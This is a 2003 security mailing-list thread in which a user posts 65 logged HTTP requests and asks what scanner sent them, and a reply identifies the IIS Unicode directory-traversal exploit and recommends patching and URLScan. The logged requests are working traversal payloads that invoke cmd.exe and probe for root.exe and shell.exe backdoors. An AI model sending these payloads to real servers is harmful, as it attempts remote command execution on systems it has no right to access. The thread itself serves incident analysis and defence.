Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Re: New attack or old Vulnerability Scanner?

From: jac <johann.coulon () sulzer com>
Date: 29 Apr 2003 20:21:49 -0000
In-Reply-To: <20030424234343.8177.qmail () www securityfocus com>

Hi Mark,

The pattern is the UNICODE Exploit. Depending on the HTTP Response 200 
(Success) or 404 (Not Found) you may be affected by this exploit when 
running a unpatched Version of IIS 4.0/5.0. Have a closer look at your 
Webserver Logfiles. If you don't see the HTTP Response you may prefer to 
configure the logfile output with extened logging options for future 
analysis.

You can take good prevention from this and several other attacks by 
applying all security patches, using Microsoft's URLScan and do some 
hardening on your internet server(s).

Johann Coulon



Received: (qmail 25276 invoked from network); 25 Apr 2003 18:30:44 -0000
Received: from outgoing3.securityfocus.com (205.206.231.27)
 by mail.securityfocus.com with SMTP; 25 Apr 2003 18:30:44 -0000
Received: from lists.securityfocus.com (lists.securityfocus.com 

[205.206.231.19])

      by outgoing3.securityfocus.com (Postfix) with QMQP
      id BBDE1A311B; Fri, 25 Apr 2003 12:35:34 -0600 (MDT)
Mailing-List: contact incidents-help () securityfocus com; run by ezmlm
Precedence: bulk
List-Id: <incidents.list-id.securityfocus.com>
List-Post: <mailto:incidents () securityfocus com>
List-Help: <mailto:incidents-help () securityfocus com>
List-Unsubscribe: <mailto:incidents-unsubscribe () securityfocus com>
List-Subscribe: <mailto:incidents-subscribe () securityfocus com>
Delivered-To: mailing list incidents () securityfocus com
Delivered-To: moderator for incidents () securityfocus com
Received: (qmail 29971 invoked from network); 24 Apr 2003 23:24:29 -0000
Date: 24 Apr 2003 23:43:43 -0000
Message-ID: <20030424234343.8177.qmail () www securityfocus com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: Mark Embrich <mark_embrich () yahoo com>
To: incidents () securityfocus com
Subject: New attack or old Vulnerability Scanner?



Hello,

Does anyone recognize this pattern of a TCP connect scan, then 65 GETs?
Note that it also included:  "User-Agent:.Mozilla/3.0.
(compatible;.Indy.Library)...."
For which my googling tells me that this attack/scanner is probably 
built using Borland Delphi/C++ Builder suite.

I've so far received 3 of these from 2 different IP addresses.
The first two were from a Comcast cable user.
The last was from a Cox Communications IP.

Thanks,
Mark Embrich

0.     Scan TCP 80
1.     GET./..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
2.     GET./..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
3.     GET./_vti_bin/.%252e/.%252e/.%252e/.%
252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
4.     GET./_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%
63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
5.     GET./_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%
35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
6.     GET./_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%
63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
7.     GET./_vti_bin/..%255c..%255c..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
8.     GET./_vti_bin/..%255c..%255c..%255c..%255c..%
255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
9.     GET./_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
10.    GET./_vti_bin/..%c0%af../..%c0%af../..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
11.    GET./_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
12.    GET./_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
13.    GET./adsamples/..%255c..%255c..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
14.    GET./adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
15.    GET./cgi-bin/..%255c..%255c..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
16.    GET./cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
17.    GET./iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%
252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
18.    GET./iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
19.    GET./iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
20.    GET./iisadmpwd/..%c0%af../..%c0%af../..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
21.    GET./msadc/.%252e/.%252e/.%252e/.%
252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
22.    GET./MSADC/..%%35%63..%%35%63..%%35%63..%%35%
63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
23.    GET./msadc/..%%35%63../..%%35%63../..%%35%
63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
24.    GET./MSADC/..%%35c..%%35c..%%35c..%%
35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
25.    GET./msadc/..%%35c../..%%35c../..%%
35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
26.    GET./msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%
63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
27.    GET./msadc/..%25%35%63../..%25%35%63../..%25%35%
63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
28.    GET./msadc/..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
29.    GET./msadc/..%255c../..%255c../..%
255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
30.    GET./msadc/..%c0%af../..%c0%af../..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
31.    GET./msadc/..%c0%af../..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
32.    GET./msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%
af../winnt/system32/cmd.exe/?/c/+dir+c:.HTTP/1.1..
33.    GET./msdac/root.exe?/c+dir+c:.HTTP/1.1..
34.    GET./msdac/shell.exe?/c+dir+c:.HTTP/1.1..
35.    GET./PBServer/..%%35%63..%%35%63..%%35%
63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
36.    GET./PBServer/..%%35c..%%35c..%%
35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
37.    GET./PBServer/..%25%35%63..%25%35%63..%25%35%
63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
38.    GET./PBServer/..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
39.    GET./Rpc/..%%35%63..%%35%63..%%35%
63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
40.    GET./Rpc/..%%35c..%%35c..%%
35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
41.    GET./Rpc/..%25%35%63..%25%35%63..%25%35%
63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
42.    GET./Rpc/..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
43.    GET./samples/..%255c..%255c..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
44.    GET./samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
45.    GET./scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
46.    GET./scripts/.%252e/.%
252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
47.    GET./scripts/..%252f..%252f..%252f..%
252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
48.    GET./scripts/..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
49.    GET./scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
50.    GET./scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%
AFwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
51.    GET./scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
52.    GET./scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
53.    GET./scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%
1Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
54.    GET./scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
55.    GET./scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
56.    GET./scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%
9Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
57.    GET./scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
58.    GET./scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
59.    GET./scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
60.    GET./scripts/..%e0%80%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
61.    GET./scripts/..%f0%80%80%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
62.    GET./scripts/..%f8%80%80%80%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
63.    GET./scripts/..%fc%80%80%80%80%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
64.    GET./scripts/root.exe?/c+dir+c:.HTTP/1.1..
65.    GET./scripts/shell.exe?/c+dir+c:.HTTP/1.1..

--------------------------------------------------------------------------

--

Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the 
world's premier event for IT and network security experts.  The two-day 
Training features 6 hand-on courses on May 12-13 taught by 

professionals.  

The two-day Briefings on May 14-15 features 24 top speakers with no 

vendor 

sales pitches.  Deadline for the best rates is April 25.  Register today 

to 

ensure your place. http://www.securityfocus.com/BlackHat-incidents 
--------------------------------------------------------------------------

--





----------------------------------------------------------------------------
Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the 
world's premier event for IT and network security experts.  The two-day 
Training features 6 hand-on courses on May 12-13 taught by professionals.  
The two-day Briefings on May 14-15 features 24 top speakers with no vendor 
sales pitches.  Deadline for the best rates is April 25.  Register today to 
ensure your place. http://www.securityfocus.com/BlackHat-incidents 
----------------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: